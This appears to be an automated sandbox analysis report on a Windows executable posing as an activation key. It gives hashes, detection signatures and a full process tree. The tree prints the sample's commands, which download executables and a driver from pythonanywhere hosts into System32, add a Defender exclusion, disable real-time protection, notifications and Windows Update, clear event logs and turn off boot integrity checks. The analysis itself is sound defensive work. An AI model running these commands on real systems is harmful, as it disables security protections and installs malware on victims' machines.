Analysis
-
max time kernel
13s -
max time network
28s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system -
submitted
29-06-2023 05:28
Behavioral task
behavioral1
Sample
3KHY7-WNT83-DGQKR-F7HPR-844BM.exe
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
3KHY7-WNT83-DGQKR-F7HPR-844BM.exe
Resource
win10v2004-20230621-en
General
-
Target
3KHY7-WNT83-DGQKR-F7HPR-844BM.exe
-
Size
7.1MB
-
MD5
4ef838c6831d52f4ce761ed79cdb218b
-
SHA1
9b189df23199b62764a044e0a11ce1219ec89b58
-
SHA256
4932d6fa5bf268a2712d451e2f88bb33e4cef5b2a77a0b556bca334cc415b6c8
-
SHA512
a09e8c57f6153a9115f0dbc43f97f7dc5d22abd4ddebc9d6a7b6d39f3d79e1ea6f1e34919645a2be2bcfa10911d6642c5f01702b7adfe59b3bae99b96756d18e
-
SSDEEP
196608:hdYeaJDfyGlW21X5Sp6GemDMPwuWg1Lm0p4YPtVZvtq:/YeaJDfDllpfaMP7JOClq
Malware Config
Signatures
-
Clears Windows event logs 1 TTPs 1 IoCs
pid Process 2756 wevtutil.exe -
Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
pid Process 6016 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 24 368 powershell.exe -
Loads dropped DLL 6 IoCs
pid Process 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\System32\windows.config 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe -
Suspicious behavior: EnumeratesProcesses 52 IoCs
pid Process 3376 powershell.exe 3376 powershell.exe 368 powershell.exe 368 powershell.exe 4236 powershell.exe 4236 powershell.exe 3988 powershell.exe 3988 powershell.exe 5044 powershell.exe 5044 powershell.exe 4236 powershell.exe 2276 powershell.exe 2276 powershell.exe 2496 powershell.exe 2496 powershell.exe 2680 powershell.exe 2680 powershell.exe 4900 powershell.exe 4900 powershell.exe 228 powershell.exe 228 powershell.exe 3784 powershell.exe 3784 powershell.exe 416 powershell.exe 416 powershell.exe 3988 powershell.exe 3988 powershell.exe 5044 powershell.exe 2276 powershell.exe 4676 powershell.exe 4676 powershell.exe 2360 powershell.exe 2360 powershell.exe 2496 powershell.exe 2680 powershell.exe 4900 powershell.exe 228 powershell.exe 2360 powershell.exe 3784 powershell.exe 416 powershell.exe 4676 powershell.exe 6028 powershell.exe 6028 powershell.exe 6108 powershell.exe 6108 powershell.exe 6140 powershell.exe 6140 powershell.exe 6116 powershell.exe 6116 powershell.exe 6124 powershell.exe 6124 powershell.exe 6028 powershell.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 3376 powershell.exe Token: SeDebugPrivilege 368 powershell.exe Token: SeDebugPrivilege 4236 powershell.exe Token: SeDebugPrivilege 3988 powershell.exe Token: SeDebugPrivilege 5044 powershell.exe Token: SeDebugPrivilege 2276 powershell.exe Token: SeDebugPrivilege 2496 powershell.exe Token: SeSecurityPrivilege 2756 wevtutil.exe Token: SeBackupPrivilege 2756 wevtutil.exe Token: SeDebugPrivilege 2680 powershell.exe Token: SeDebugPrivilege 4900 powershell.exe Token: SeDebugPrivilege 228 powershell.exe Token: SeDebugPrivilege 4676 powershell.exe Token: SeDebugPrivilege 3784 powershell.exe Token: SeDebugPrivilege 416 powershell.exe Token: SeDebugPrivilege 2360 powershell.exe Token: SeShutdownPrivilege 5644 powercfg.exe Token: SeCreatePagefilePrivilege 5644 powercfg.exe Token: SeShutdownPrivilege 5808 powercfg.exe Token: SeCreatePagefilePrivilege 5808 powercfg.exe Token: SeDebugPrivilege 6028 powershell.exe Token: SeDebugPrivilege 6108 powershell.exe Token: SeDebugPrivilege 6140 powershell.exe Token: SeDebugPrivilege 6116 powershell.exe Token: SeDebugPrivilege 6124 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4584 wrote to memory of 2112 4584 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 83 PID 4584 wrote to memory of 2112 4584 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 83 PID 2112 wrote to memory of 1980 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 84 PID 2112 wrote to memory of 1980 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 84 PID 1980 wrote to memory of 3376 1980 cmd.exe 86 PID 1980 wrote to memory of 3376 1980 cmd.exe 86 PID 2112 wrote to memory of 3680 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 87 PID 2112 wrote to memory of 3680 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 87 PID 3680 wrote to memory of 368 3680 cmd.exe 89 PID 3680 wrote to memory of 368 3680 cmd.exe 89 PID 2112 wrote to memory of 896 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 94 PID 2112 wrote to memory of 896 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 94 PID 2112 wrote to memory of 2836 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 95 PID 2112 wrote to memory of 2836 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 95 PID 2112 wrote to memory of 2832 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 138 PID 2112 wrote to memory of 2832 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 138 PID 2112 wrote to memory of 2928 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 137 PID 2112 wrote to memory of 2928 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 137 PID 2112 wrote to memory of 1140 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 96 PID 2112 wrote to memory of 1140 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 96 PID 2112 wrote to memory of 2988 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 135 PID 2112 wrote to memory of 2988 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 135 PID 2112 wrote to memory of 4692 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 134 PID 2112 wrote to memory of 4692 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 134 PID 2112 wrote to memory of 3688 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 133 PID 2112 wrote to memory of 3688 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 133 PID 2112 wrote to memory of 2468 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 131 PID 2112 wrote to memory of 2468 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 131 PID 2112 wrote to memory of 2668 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 129 PID 2112 wrote to memory of 2668 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 129 PID 2112 wrote to memory of 4960 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 128 PID 2112 wrote to memory of 4960 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 128 PID 2112 wrote to memory of 3684 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 127 PID 2112 wrote to memory of 3684 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 127 PID 2112 wrote to memory of 3476 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 98 PID 2112 wrote to memory of 3476 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 98 PID 2112 wrote to memory of 2716 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 124 PID 2112 wrote to memory of 2716 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 124 PID 2112 wrote to memory of 2560 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 123 PID 2112 wrote to memory of 2560 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 123 PID 2112 wrote to memory of 4500 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 122 PID 2112 wrote to memory of 4500 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 122 PID 2112 wrote to memory of 4464 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 120 PID 2112 wrote to memory of 4464 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 120 PID 2112 wrote to memory of 548 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 119 PID 2112 wrote to memory of 548 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 119 PID 2112 wrote to memory of 2856 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 118 PID 2112 wrote to memory of 2856 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 118 PID 2112 wrote to memory of 4136 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 115 PID 2112 wrote to memory of 4136 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 115 PID 2112 wrote to memory of 2724 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 114 PID 2112 wrote to memory of 2724 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 114 PID 2112 wrote to memory of 1924 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 102 PID 2112 wrote to memory of 1924 2112 3KHY7-WNT83-DGQKR-F7HPR-844BM.exe 102 PID 896 wrote to memory of 4236 896 cmd.exe 117 PID 896 wrote to memory of 4236 896 cmd.exe 117 PID 2836 wrote to memory of 5044 2836 cmd.exe 140 PID 2836 wrote to memory of 5044 2836 cmd.exe 140 PID 2716 wrote to memory of 3188 2716 cmd.exe 139 PID 2716 wrote to memory of 3188 2716 cmd.exe 139 PID 1924 wrote to memory of 3988 1924 cmd.exe 142 PID 1924 wrote to memory of 3988 1924 cmd.exe 142 PID 1140 wrote to memory of 2276 1140 cmd.exe 141 PID 1140 wrote to memory of 2276 1140 cmd.exe 141
Processes
-
C:\Users\Admin\AppData\Local\Temp\3KHY7-WNT83-DGQKR-F7HPR-844BM.exe"C:\Users\Admin\AppData\Local\Temp\3KHY7-WNT83-DGQKR-F7HPR-844BM.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Users\Admin\AppData\Local\Temp\3KHY7-WNT83-DGQKR-F7HPR-844BM.exe"C:\Users\Admin\AppData\Local\Temp\3KHY7-WNT83-DGQKR-F7HPR-844BM.exe"2⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12"3⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls124⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Invoke-WebRequest -Uri "https://KMSConnection.pythonanywhere.com/static/ActivationKey.file" -OutFile "C:\Users\Admin\AppData\Local\Temp/.txt""3⤵
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri "https://KMSConnection.pythonanywhere.com/static/ActivationKey.file" -OutFile "C:\Users\Admin\AppData\Local\Temp/.txt"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -ExclusionPath "C:\\""3⤵
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -ExclusionPath "C:\\"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-ExecutionPolicy -Scope LocalMachine -ExecutionPolicy Unrestricted -force"3⤵
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-ExecutionPolicy -Scope LocalMachine -ExecutionPolicy Unrestricted -force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell powercfg /change standby-timeout-ac 0"3⤵
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell powercfg /change standby-timeout-ac 04⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2276 -
C:\Windows\system32\powercfg.exe"C:\Windows\system32\powercfg.exe" /change standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:5644
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add "HKLM\Software\Microsoft\Windows Defender\Notifications" /v "DisableNotifications" /t REG_DWORD /d 1 /f"3⤵PID:3476
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows Defender\Notifications" /v "DisableNotifications" /t REG_DWORD /d 1 /f4⤵PID:4648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12"3⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls124⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "DisabledMenuItems" /t REG_DWORD /d 1 /f"3⤵PID:2724
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "DisabledMenuItems" /t REG_DWORD /d 1 /f4⤵PID:4248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell bcdedit /set nointegritychecks on"3⤵PID:4136
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell bcdedit /set nointegritychecks on4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2680 -
C:\Windows\system32\bcdedit.exe"C:\Windows\system32\bcdedit.exe" /set nointegritychecks on5⤵
- Modifies boot configuration data using bcdedit
PID:6016
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-Service wuauserv -StartupType Disabled"3⤵PID:2856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-Service wuauserv -StartupType Disabled4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Account protection" /t REG_DWORD /v UILockdown /d 1 /f"3⤵PID:548
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Account protection" /t REG_DWORD /v UILockdown /d 1 /f4⤵PID:4428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /t REG_DWORD /v DisableNotifications /d 1 /f"3⤵PID:4464
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /t REG_DWORD /v DisableNotifications /d 1 /f4⤵PID:5060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Virus and threat protection" /t REG_DWORD /v UILockdown /d 1 /f"3⤵PID:4500
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Virus and threat protection" /t REG_DWORD /v UILockdown /d 1 /f4⤵PID:1320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Virus and threat protection" /t REG_DWORD /v HideRansomwareRecovery /d 1 /f"3⤵PID:2560
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Virus and threat protection" /t REG_DWORD /v HideRansomwareRecovery /d 1 /f4⤵PID:368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f"3⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f4⤵PID:3188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add "HKLM\Software\Policies\Microsoft\WindowsFirewall\Notifications" /v "DisableNotifications" /t REG_DWORD /d 1 /f"3⤵PID:3684
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\WindowsFirewall\Notifications" /v "DisableNotifications" /t REG_DWORD /d 1 /f4⤵PID:928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WEVTUtil.exe clear-log Application"3⤵PID:4960
-
C:\Windows\system32\wevtutil.exeWEVTUtil.exe clear-log Application4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -MAPSReporting 0"3⤵PID:2668
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -MAPSReporting 04⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\Main" -Name "DisablePrivacyPreload" -Value 1"3⤵PID:2468
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\Main" -Name "DisablePrivacyPreload" -Value 14⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\Main" -Name "AllowPrelaunch" -Value 0"3⤵PID:3688
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\Main" -Name "AllowPrelaunch" -Value 04⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ChildItem -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Privacy\Location" | Set-ItemProperty -Name "Status" -Value 0"3⤵PID:4692
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ChildItem -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Privacy\Location"4⤵PID:1268
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell powercfg /S e9a42b02-d5df-448d-aa00-03f14749eb61"3⤵PID:2988
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell powercfg /S e9a42b02-d5df-448d-aa00-03f14749eb614⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2496 -
C:\Windows\system32\powercfg.exe"C:\Windows\system32\powercfg.exe" /S e9a42b02-d5df-448d-aa00-03f14749eb615⤵
- Suspicious use of AdjustPrivilegeToken
PID:5808
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock" -Name "AllowDevelopmentWithoutDevLicense" -Value 1"3⤵PID:2928
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock" -Name "AllowDevelopmentWithoutDevLicense" -Value 14⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection" -Name "AllowTelemetry" -Value 0"3⤵PID:2832
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection" -Name "AllowTelemetry" -Value 04⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Invoke-WebRequest -Uri 'https://ConnectionAAA.pythonanywhere.com/static/WebFeatures.png' -OutFile 'C:\Windows\System32\WebFeatures.exe'"3⤵PID:5696
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri 'https://ConnectionAAA.pythonanywhere.com/static/WebFeatures.png' -OutFile 'C:\Windows\System32\WebFeatures.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ComputerInfo WindowsProductName"3⤵PID:5732
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ComputerInfo WindowsProductName4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Invoke-WebRequest -Uri 'https://ConnectionABB.pythonanywhere.com/static/WinRing0x64.png' -OutFile 'C:\Windows\System32\WinRing0x64.sys'"3⤵PID:5720
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri 'https://ConnectionABB.pythonanywhere.com/static/WinRing0x64.png' -OutFile 'C:\Windows\System32\WinRing0x64.sys'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Invoke-WebRequest -Uri 'https://ConnectionABB.pythonanywhere.com/static/VisualFeatures.png' -OutFile 'C:\Windows\System32\VisualFeatures.exe'"3⤵PID:5712
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri 'https://ConnectionABB.pythonanywhere.com/static/VisualFeatures.png' -OutFile 'C:\Windows\System32\VisualFeatures.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Invoke-WebRequest -Uri 'https://ConnectionAAB.pythonanywhere.com/static/delegatedWebFeatures.png' -OutFile 'C:\Windows\System32\delegatedWebFeatures.exe'"3⤵PID:5704
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri 'https://ConnectionAAB.pythonanywhere.com/static/delegatedWebFeatures.png' -OutFile 'C:\Windows\System32\delegatedWebFeatures.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cscript C:\Windows\System32\slmgr.vbs /ipk W269N-WFGWX-YVC9B-4J6C9-T83GX"3⤵PID:4628
-
C:\Windows\system32\cscript.execscript C:\Windows\System32\slmgr.vbs /ipk W269N-WFGWX-YVC9B-4J6C9-T83GX4⤵PID:5588
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
1KB
MD51dffbab5ecc6d06e8b259ad505a0dc2a
SHA10938ec61e4af55d7ee9d12708fdc55c72ccb090c
SHA256a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e
SHA51293209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76
-
Filesize
64B
MD5fbb034a8c5161e1db10257a0996dbf1c
SHA195ea0a2dddaa1d0034e404a0feeb6a7ed82a829f
SHA2564b8310716328e798cea2b6c67f9808849ef0e8fb532db48e7e4e1b378f7bbc96
SHA512e8fdcb9b26ef8974f9e07bee1b02476434d3f9b0897bced92b74709d037e1c2d23126466c55fc1e5232ab6510f11e4d460e3ed4089acb0e06db50641dc14d302
-
Filesize
64B
MD570258ac4c201bbbff407ee6a1fc3e580
SHA11a166a4b9c933c28df4ed158505eaf4a8d3d14ad
SHA25687631fdf63761dabd098ccc14464676891c347de32087216af62f20dffa6317d
SHA5127c7a4da9f57a5a5b4121997bf066d8b14b82eadb42f76ae85824ce47e137aa1c8033691a579169ac011ba9a2d00b063c31c659b55a1bec69688dd7ded78ff598
-
Filesize
1KB
MD52238871af228384f4b8cdc65117ba9f1
SHA12a200725f1f32e5a12546aa7fd7a8c5906757bd1
SHA256daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882
SHA5121833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf
-
Filesize
1KB
MD52238871af228384f4b8cdc65117ba9f1
SHA12a200725f1f32e5a12546aa7fd7a8c5906757bd1
SHA256daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882
SHA5121833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
1KB
MD52238871af228384f4b8cdc65117ba9f1
SHA12a200725f1f32e5a12546aa7fd7a8c5906757bd1
SHA256daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882
SHA5121833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
